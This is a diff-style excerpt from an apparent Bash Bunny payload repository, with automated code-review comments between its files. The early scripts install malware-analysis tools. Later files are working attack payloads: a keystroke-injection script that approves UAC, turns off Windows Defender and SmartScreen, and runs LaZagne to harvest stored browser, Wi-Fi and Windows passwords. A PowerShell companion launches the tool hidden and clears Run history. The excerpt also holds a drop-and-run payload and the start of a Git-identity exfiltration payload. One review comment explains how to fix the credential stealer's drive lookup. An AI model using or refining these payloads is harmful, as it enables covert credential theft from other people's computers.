cd yaffshiv
|
||||||
|
python setup.py install
|
||||||
|
|
||||||
|
cd ..
|
||||||
|
wget -O - http://my.smithmicro.com/downloads/files/stuffit520.611linux-i386.tar.gz | tar -zxv
|
||||||
|
cp bin/unstuff /usr/local/bin/
|
||||||
|
|
||||||
|
python setup.py install
|
|
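Review bot: L2713 fetches a binary StuffIt tarball over plain HTTP, pipes it straight into `tar`, and L2717 copies the resulting `unstuff` into `/usr/local/bin` as root with no checksum or signature check, so an on-path attacker gets code execution on the analysis box; at minimum use `https://` and compare a pinned `sha256sum` before the `cp`. The script has no `set -e`, and every step is a `cd` into a directory created by the previous `git clone` (L2611-L2698): if any clone fails, the following `./build.sh` / `python setup.py install` run in the parent directory instead, which is why a `set -euo pipefail` line after the shebang matters here. The comment on L2637-L2641 says `build.sh` must be hand-edited to remove `sudo`, but the script runs it unmodified on L2645, so the sasquatch build presumably fails on the Bunny; either apply the edit with `sed` or document the expected failure. The clones are also unpinned (default branch), which makes the installed toolchain irreproducible.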
@ -0,0 +1,21 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: capstone install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
cd /tmp/
|
||||||
|
wget https://github.com/aquynh/capstone/archive/3.0.5-rc2.tar.gz
|
||||||
|
tar xf 3.0.5-rc2.tar.gz
|
||||||
|
rm 3.0.5-rc2.tar.gz
|
||||||
|
mv capstone-3.0.5-rc2/ /tools/capstone
|
||||||
|
|
||||||
|
cd /tools/capstone
|
||||||
|
make
|
||||||
|
make install
|
||||||
|
|
||||||
|
cd bindings/python
|
||||||
|
make install
|
|
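Review bot: The tarball downloaded on L2770 is installed system-wide with `make install` (L2797, L2808) without any integrity check, and L2778 deletes it before anything could have verified it; add a pinned `sha256sum -c` between `wget` and `tar xf`. Everything runs as root with no `set -e`, so a failed `wget` leaves `tar`, `mv` and `make` running against whatever happens to be in `/tmp` — add `set -e` after the shebang.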
@ -0,0 +1,29 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: dshell install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
|
||||||
|
apt-get install -y python-dpkt python-ipy python-pypcap
|
||||||
|
pip install pygeoip
|
||||||
|
|
||||||
|
cd /tools/
|
||||||
|
git clone https://github.com/USArmyResearchLab/Dshell dshell
|
||||||
|
cd dshell
|
||||||
|
|
||||||
|
cd share/GeoIP/
|
||||||
|
wget http://geolite.macxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz
|
||||||
|
gunzip -d GeoIP.dat.gz
|
||||||
|
wget http://geolite.maxmind.com/download/geoip/database/GeoIPv6.dat.gz
|
||||||
|
gunzip -d GeoIPv6.dat.gz
|
||||||
|
wget http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNum.dat.gz
|
||||||
|
gunzip -d GeoIPASNum.dat.gz
|
||||||
|
wget http://download.maxmind.com/download/geoip/database/asnum/GeoIPASNumv6.dat.gz
|
||||||
|
gunzip -d GeoIPASNumv6.dat.gz
|
||||||
|
cd ../../
|
||||||
|
|
||||||
|
make
|
|
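Review bot: The host on L2883 is `geolite.macxmind.com`, which does not match `geolite.maxmind.com` on L2891 — a typo that sends the first GeoIP download to a different domain than intended, over plain HTTP. All four database downloads (L2883-L2907) are unverified `http://` fetches of data the tool later parses, so fix the hostname, switch to `https://` and verify checksums, or say in a comment that these legacy GeoLite paths may no longer be served. Without `set -e`, a failed `wget` makes the following `gunzip -d` fail and `make` still runs.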
@ -0,0 +1,17 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: featherduster install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
apt-get install -y libgmp3-dev
|
||||||
|
apt-get install -y libncurses-dev
|
||||||
|
|
||||||
|
cd /tools
|
||||||
|
git clone https://github.com/nccgroup/featherduster
|
||||||
|
cd featherduster
|
||||||
|
|
||||||
|
python setup.py install
|
|
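Review bot: `cd /tools` on L2975 is unchecked and nothing in the visible setup creates `/tools`; if it is missing, the clone on L2979 lands in the current directory and `python setup.py install` (L2990) installs from wherever `cd featherduster` ended up. Add `set -e` after the shebang so a failed `cd` stops the script, and pin the clone to a tag or commit rather than the default branch, since this is installed system-wide as root.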
@ -0,0 +1,33 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: peepdf install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
|
||||||
|
apt-get install -y unzip python-libemu
|
||||||
|
|
||||||
|
cd /tmp/
|
||||||
|
wget http://eternal-todo.com/files/pdf/peepdf/peepdf_0.3.zip
|
||||||
|
unzip peepdf_0.3.zip
|
||||||
|
mv peepdf_0.3 /tools/peepdf
|
||||||
|
cd /tools/peepdf
|
||||||
|
|
||||||
|
#mkdir dpt
|
||||||
|
#cd dpt
|
||||||
|
#wget https://storage.googleapis.com/chrome-infra/depot_tools.zip
|
||||||
|
#unzip depot_tools.zip
|
||||||
|
#cd ..
|
||||||
|
#mv dpt /tools/depot_tools
|
||||||
|
#echo 'export PATH=$PATH:$HOME/../tools/depot_tools' >> ~/.bashrc
|
||||||
|
#gclient
|
||||||
|
#mkdir /tools/v8
|
||||||
|
#cd /tools/v8
|
||||||
|
#fetch v8
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
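Review bot: L3046 downloads peepdf over plain HTTP from a personal domain and installs it unverified into `/tools` (L3054), and this is the tool that will later be pointed at hostile PDFs; switch to `https://`, pin a checksum, and add `set -e`. The commented-out block on L3065-L3105 (depot_tools/v8 setup) is dead code that includes an odd `PATH` entry (`$HOME/../tools/depot_tools`); either delete it or replace it with a one-line comment explaining that the JavaScript-analysis dependency is intentionally not installed.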
@ -0,0 +1,15 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: punbup install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
|
||||||
|
cd /tools
|
||||||
|
git clone https://github.com/herrcore/punbup
|
||||||
|
cd punbup
|
||||||
|
python setup.py install
|
||||||
|
|
|
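Review bot: The clone on L3166 tracks the default branch and the install on L3174 runs as root with no `set -e`, so a failed `cd /tools` or `cd punbup` leaves `python setup.py install` running in the wrong directory; pin a commit (`git clone` then `git checkout <sha>`) and add `set -e`. Note that `setup.sh` in this same change never calls `./punbup.sh`, although the README lists punbup as installed.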
@ -0,0 +1,30 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: main install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
|
||||||
|
# Install System Dependencies
|
||||||
|
apt-get install -y automake libtool make gcc flex bison libmagic-dev libssl-dev python-dev swig libfuzzy-dev exiftool
|
||||||
|
|
||||||
|
# Install Python Dependencies
|
||||||
|
pip install SQLAlchemy PrettyTable python-magic
|
||||||
|
|
||||||
|
# Other Tools
|
||||||
|
apt-get -y install python-scapy pyew unzip
|
||||||
|
|
||||||
|
# Setup Custom Tools
|
||||||
|
./ssdeep.sh
|
||||||
|
./yara.sh
|
||||||
|
./viper.sh
|
||||||
|
./dshell.sh
|
||||||
|
./capstone.sh
|
||||||
|
./binwalk.sh
|
||||||
|
./featherduster.sh
|
||||||
|
./wabt.sh
|
||||||
|
./peepdf.sh
|
||||||
|
|
|
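Review bot: Every sub-script invoked on L3259-L3291 does `cd /tools`, but nothing here creates `/tools`, so on a fresh Bunny each of them runs its clone, `mv` and install steps in the wrong directory; add `mkdir -p /tools` before the `# Setup Custom Tools` block. The sub-scripts are invoked as `./x.sh`, which only works when the caller's working directory is this script's directory — use `cd "$(dirname "$0")"` first or call them by absolute path. `./punbup.sh` is never run although the README in this change lists punbup as installed, and with no `set -e` a failure in any sub-script is silently skipped; `apt-get install` is also run without a preceding `apt-get update`, which on a fresh image is likely to miss packages.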
@ -0,0 +1,23 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: ssdeep install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
cd /tmp
|
||||||
|
|
||||||
|
wget https://github.com/ssdeep-project/ssdeep/archive/release-2.14.1.tar.gz
|
||||||
|
tar xf release-2.14.1.tar.gz
|
||||||
|
rm release-2.14.1.tar.gz
|
||||||
|
mv ssdeep-release-2.14.1/ /tools/ssdeep
|
||||||
|
cd /tools/ssdeep
|
||||||
|
|
||||||
|
./bootstrap
|
||||||
|
./configure
|
||||||
|
make
|
||||||
|
make install
|
||||||
|
|
||||||
|
pip install pydeep
|
|
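Review bot: The release tarball on L3343 is unpacked and installed with `make install` (L3378) without a checksum, and `rm` on L3351 discards it before verification is possible; add a pinned `sha256sum -c` after the `wget` and `set -e` after the shebang so a failed download does not leave `tar`/`mv`/`./bootstrap` running against `/tmp`. `pip install pydeep` on L3385 is unpinned, so the Python binding may drift from the 2.14.1 library built here — consider pinning it.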
@ -0,0 +1,17 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: viper install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
cd /tmp
|
||||||
|
wget https://github.com/viper-framework/viper/archive/v1.2.tar.gz
|
||||||
|
tar xf v1.2.tar.gz
|
||||||
|
rm v1.2.tar.gz
|
||||||
|
mv viper-1.2/ /tools/viper
|
||||||
|
|
||||||
|
cd /tools/viper
|
||||||
|
pip install -r requirements.txt
|
|
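Review bot: `pip install -r requirements.txt` on L3454 installs whatever the 1.2 tarball's requirements resolve to today, system-wide as root and without hash verification; this is the component later exposed as a web service by the switch1 payload, so pin it (`pip install --require-hashes`) or at least record the resolved versions. As with the other install scripts, there is no checksum on the tarball from L3431 and no `set -e`, so a failed download leaves `tar`, `mv` and `pip` running on whatever is in `/tmp`.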
@ -0,0 +1,15 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: web assembly binary toolkit install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
apt-get install cmake clang
|
||||||
|
|
||||||
|
cd /tools/
|
||||||
|
git clone --recursive https://github.com/WebAssembly/wabt
|
||||||
|
cd wabt
|
||||||
|
make
|
|
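Review bot: `apt-get install cmake clang` on L3496 is missing `-y`, unlike every other install script in this change, so in an unattended run it waits for confirmation (or aborts when there is no TTY) and the build on L3515 then fails for lack of a compiler; change it to `apt-get install -y cmake clang`. The recursive clone on L3507 is unpinned, and nothing checks that `cd /tools` on L3503 succeeded before cloning, so `set -e` after the shebang is worth adding here too.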
@ -0,0 +1,23 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: Malware Bunny
|
||||||
|
# Description: yara install script
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
# Firmware: 1.5
|
||||||
|
|
||||||
|
|
||||||
|
cd /tmp
|
||||||
|
wget https://github.com/VirusTotal/yara/archive/v3.7.0.tar.gz
|
||||||
|
tar xf v3.7.0.tar.gz
|
||||||
|
rm v3.7.0.tar.gz
|
||||||
|
mv yara-3.7.0/ /tools/yara
|
||||||
|
|
||||||
|
cd /tools/yara
|
||||||
|
./bootstrap.sh
|
||||||
|
./configure --enable-magic --enable-dotnet
|
||||||
|
make
|
||||||
|
make install
|
||||||
|
|
||||||
|
pip install yara-python
|
|
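Review bot: libyara is built from the pinned 3.7.0 tarball (L3564-L3599) but `pip install yara-python` on L3606 pulls the latest binding, which may bundle or expect a different libyara than the 3.7.0 just installed; pin it (`pip install yara-python==3.7.0`) and mention the coupling in a comment. The tarball is installed with `make install` as root with no checksum, and the script has no `set -e`, so a failed `wget` would run `tar`/`mv`/`make` against `/tmp` contents.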
@ -0,0 +1,24 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: MalwareBunny
|
||||||
|
# Description: Malware Analysis on Bash Bunny
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
#
|
||||||
|
# LED State Descriptions
|
||||||
|
# Magenta Blinking - setup in progress
|
||||||
|
# Blue Blinking - ready to use
|
||||||
|
|
||||||
|
LED M SLOW
|
||||||
|
|
||||||
|
ATTACKMODE RNDIS_ETHERNET
|
||||||
|
sleep 3
|
||||||
|
|
||||||
|
cd /tools/viper/
|
||||||
|
python web.py -H 0.0.0.0 -p 8080 &
|
||||||
|
|
||||||
|
CUCUMBER ENABLE
|
||||||
|
sleep 3
|
||||||
|
|
||||||
|
LED B SLOW
|
|
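Review bot: `python web.py -H 0.0.0.0 -p 8080 &` on L3682 binds the Viper web UI to every interface rather than only the RNDIS link, and nothing visible here adds authentication, so anything that can route to the Bunny gets a UI for uploading samples and running modules against them; bind to the RNDIS interface address and state in the header whether the UI is unauthenticated. `cd /tools/viper/` on L3678 is unchecked, so if the tools were never installed the `python` line fails and the payload still proceeds to `LED B SLOW` ("ready to use"); write it as `cd /tools/viper/ || { LED R SLOW; exit 1; }` so the LED reflects reality. The backgrounded server also has no log redirect, so errors from `web.py` go nowhere.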
@ -0,0 +1,18 @@
|
||||||
|
#!/bin/bash
|
||||||
|
# Title: MalwareBunny
|
||||||
|
# Description: Malware Analysis on Bash Bunny
|
||||||
|
# Author: Zappus
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: Incident-Response
|
||||||
|
# Attackmodes: Ethernet
|
||||||
|
#
|
||||||
|
# LED State Descriptions
|
||||||
|
# Magenta Blinking - setup in progress
|
||||||
|
# Blue Blinking - ready to use
|
||||||
|
|
||||||
|
LED M SLOW
|
||||||
|
|
||||||
|
ATTACKMODE RNDIS_ETHERNET
|
||||||
|
sleep 5
|
||||||
|
|
||||||
|
LED B SLOW
|
|
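Review bot: The payload signals "ready to use" (`LED B SLOW`, L3772) after a fixed `sleep 5` without starting or checking anything, so the README's "SSH access" for this switch position presumably relies on the firmware's default sshd and default credentials; the header should say so, and anyone exposing this over RNDIS on an analysis box should change the root password first. If sshd is expected to be running, check it before signalling blue, e.g. `pgrep -x sshd >/dev/null || LED R SLOW` (if `pgrep` is available on the image).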
@ -0,0 +1,6 @@
|
||||||
|
$drivelabel = 'BashBunny'
|
||||||
|
$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
|
||||||
|
$filter = 'password_'+ $env:COMPUTERNAME
|
||||||
|
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
|
||||||
|
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
|
||||||
|
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
|
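Review bot: The WMI filter on L3783 and L3795 is written as `'label=''$drivelabel'''`, a single-quoted PowerShell string in which `$drivelabel` is not expanded, so the query looks for a volume literally labelled `$drivelabel`, `.Name` is `$null`, `$dest` collapses to the relative path `loot\PasswordGrabber`, and `Start-Process` tries to launch `tooling\LaZagne.exe` from the current directory. Resolve the drive once with an expanding string: `$root = (Get-WmiObject win32_volume -Filter "label='$drivelabel'").Name`, then `$dest = $root + 'loot\PasswordGrabber'` and `-FilePath ($root + 'tooling\LaZagne.exe')`. Clearing `RunMRU` on L3799 removes the Run-dialog entry but not PowerShell's own PSReadLine history file if this is executed through an interactive console — worth a comment on what is and is not cleaned up.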
@ -0,0 +1,90 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: Disable Windows Defender and Exfil stored passwords
|
||||||
|
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
|
||||||
|
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
|
||||||
|
# This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
||||||
|
# Author: rafa-guillermo
|
||||||
|
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
|
||||||
|
# Version: 1.2
|
||||||
|
# Category: Credentials
|
||||||
|
# Target: Windows
|
||||||
|
# Tested On: Windows 11
|
||||||
|
# Attackmodes: HID, STORAGE
|
||||||
|
|
||||||
|
# Options
|
||||||
|
LOOTDIR=/root/udisk/loot/PasswordGrabber
|
||||||
|
|
||||||
|
######## Set-up ########
|
||||||
|
LED SETUP
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
DRIVE_LABEL=BashBunny
|
||||||
|
|
||||||
|
######## Make Loot Dir ########
|
||||||
|
# Setup named logs in loot directory
|
||||||
|
mkdir -p $LOOTDIR
|
||||||
|
|
||||||
|
####### Open a powershell window with elevated privileges #######
|
||||||
|
LED STAGE1
|
||||||
|
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
||||||
|
sleep 3 # wait for UAC prompt
|
||||||
|
QUACK ALT y
|
||||||
|
sleep 2
|
||||||
|
|
||||||
|
# Disable Windows Defender File Scan and and Real Time Protection
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableIOAVProtection \$true
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableScriptScanning \$true
|
||||||
|
QUACK ENTER
|
||||||
|
sleep 1
|
||||||
|
|
||||||
|
# Run laZagne
|
||||||
|
LED STAGE2
|
||||||
|
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING \& \$scriptPath
|
||||||
|
QUACK ENTER
|
||||||
|
sleep 10
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
|
||||||
|
# Re-enable Defender and Smart screen
|
||||||
|
LED CLEANUP
|
||||||
|
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
||||||
|
sleep 3 # wait for UAC prompt
|
||||||
|
QUACK ALT y
|
||||||
|
sleep 2
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableIOAVProtection \$false
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK STRING Set-MpPreference -DisableScriptScanning \$false
|
||||||
|
QUACK ENTER
|
||||||
|
sleep 1
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
######## FINISH ########
|
||||||
|
LED FINISH
|
|
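Review bot: The comment at L3937, `# Disable Windows Defender File Scan and and Real Time Protection`, does not describe the three lines that follow it (L3941–L3957), which change SmartScreen registry values for Explorer and Edge; the Defender preferences only start at L3965. Split it into `# Turn off SmartScreen (Explorer, Edge)` before L3941 and `# Turn off Defender real-time, IOAV, behaviour and script scanning` before L3965, and drop the doubled "and and". The header states `Version: 1.2` (L3838) while the README added in this commit says `Version: 1.0` (L4175) — align them. Note also that the clean-up stage (L4058 onward) only runs if the payload reaches it; an unplug between L3965 and L4102 leaves the host with Defender real-time protection off, which the header or README should state so operators know to restore it manually.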
@ -0,0 +1,39 @@
|
||||||
|
# NoDefenseAgainstLaZagne
|
||||||
|
|
||||||
|
* Author: [rafa-guillermo](https://github.com/rafa-guillermo)
|
||||||
|
* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade, jdebetaz
|
||||||
|
* Version: 1.0
|
||||||
|
* Frimware support: 1.1 and higher
|
||||||
|
* Target version: Windows 11
|
||||||
|
* Tested on: Windows 11
|
||||||
|
|
||||||
|
## Description
|
||||||
|
Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
||||||
|
|
||||||
|
Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
|
||||||
|
Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber)
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
|
||||||
|
2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
|
||||||
|
3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
|
||||||
|
4. Plug your BashBunny and Enjoy
|
||||||
|
|
||||||
|
|
||||||
|
## Info
|
||||||
|
rafa-guillermo: I've added a whole bunch of stuff to disable Windows Defender file scanner, smart screen and RTP before running LaZagne, I was having issues where otherwise it would immediately be quarantined. Defender will be enabled again after execution.
|
||||||
|
|
||||||
|
jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
|
||||||
|
|
||||||
|
RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
|
||||||
|
|
||||||
|
## Disclaimer
|
||||||
|
__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
|
||||||
|
|
||||||
|
## Led status
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
|-----------------------------------------------|--------|
|
||||||
|
| Magenta solid | Setup |
|
||||||
|
| Yellow single blink | Attack |
|
||||||
|
| Green 1000ms VERYFAST blink followed by SOLID | Finish |
|
|
@ -0,0 +1,7 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Wake up and do something productive here instead...
|
||||||
|
sleep 10
|
||||||
|
|
||||||
|
# boom!!
|
||||||
|
firefox "http://hak5.org"
|
|
@ -0,0 +1,30 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: The Ol'Drop'n'Run
|
||||||
|
# Author: bg-wa
|
||||||
|
# Version: 1.0
|
||||||
|
# Category: HID
|
||||||
|
# Target: UNITY
|
||||||
|
# Attackmodes: HID
|
||||||
|
#
|
||||||
|
# Quick HID only attack to write a file to target machine and open
|
||||||
|
#
|
||||||
|
# | Attack Stage | Description |
|
||||||
|
# | ------------------- | ---------------------------------------- |
|
||||||
|
# | SETUP | Open vi |
|
||||||
|
# | ATTACK | Writing files |
|
||||||
|
# | FINISH | Payload Dropped & ran (remove the bunny) |
|
||||||
|
#
|
||||||
|
|
||||||
|
ATTACKMODE HID
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
source_script=/root/udisk/payloads/$SWITCH_POSITION/fuse.sh
|
||||||
|
target_script=\~/fuse.sh
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
DROP $source_script $target_script true true
|
||||||
|
RUN UNITY $target_script
|
||||||
|
|
||||||
|
LED FINISH
|
|
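Review bot: `source_script` (L4419) expands `$SWITCH_POSITION`, but this payload never calls `GET SWITCH_POSITION`, unlike the other payloads in this commit (L3880, L6209); unless the firmware exports it by default, the path becomes `/root/udisk/payloads//fuse.sh` and `DROP` has nothing to type. Add `GET SWITCH_POSITION` after `ATTACKMODE HID` (L4408). `target_script=\~/fuse.sh` (L4423) deliberately stores a literal `~` for the target shell to expand; a short comment, `# literal ~ is expanded on the target, not here`, would stop someone "fixing" the backslash.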
@ -0,0 +1,30 @@
|
||||||
|
<div align="center">
|
||||||
|
|
||||||
|
# Github Information Exfiltration
|
||||||
|
**Get Git user name and email from the Git global config and exfiltrate them**
|
||||||
|
|
||||||
|
![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white)
|
||||||
|
![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white)
|
||||||
|
|
||||||
|
![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black)
|
||||||
|
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<img width="1000" alt="banner" src="https://raw.githubusercontent.com/quentinlamamy/bashbunny/main/img/githubExfiltration.jpg"/>
|
||||||
|
|
||||||
|
# Dependency
|
||||||
|
|
||||||
|
* OSX Extension by quentin_lamamy
|
||||||
|
|
||||||
|
# Changelog
|
||||||
|
v1.0 :
|
||||||
|
* :tada: Release on 2023/08/20
|
||||||
|
|
||||||
|
# Contributing
|
||||||
|
A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues)
|
||||||
|
|
||||||
|
# License
|
||||||
|
<p xmlns:cc="http://creativecommons.org/ns#" xmlns:dct="http://purl.org/dc/terms/"><a property="dct:title" rel="cc:attributionURL" href="https://github.com/quentinlamamy/bashbunny/blob/main/payloads/githubExfiltration/payload.txt">Github Infos Exfiltration Payload</a> by <a rel="cc:attributionURL dct:creator" property="cc:attributionName" href="https://github.com/quentinlamamy">Quentin Lamamy</a> is licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/?ref=chooser-v1" target="_blank" rel="license noopener noreferrer" style="display:inline-block;">CC BY-NC-SA 4.0<img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/nc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/sa.svg?ref=chooser-v1"></a></p>
|
||||||
|
|
||||||
|
# Support
|
||||||
|
<a href="https://www.buymeacoffee.com/quentinlamamy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>
|
|
@ -0,0 +1,58 @@
|
||||||
|
#!/bin/bash
|
||||||
|
#
|
||||||
|
# Title: OSX Payload to exfiltrate Git user name and email
|
||||||
|
# Description: Get Git user name and email from the Git global config and exfiltrate them
|
||||||
|
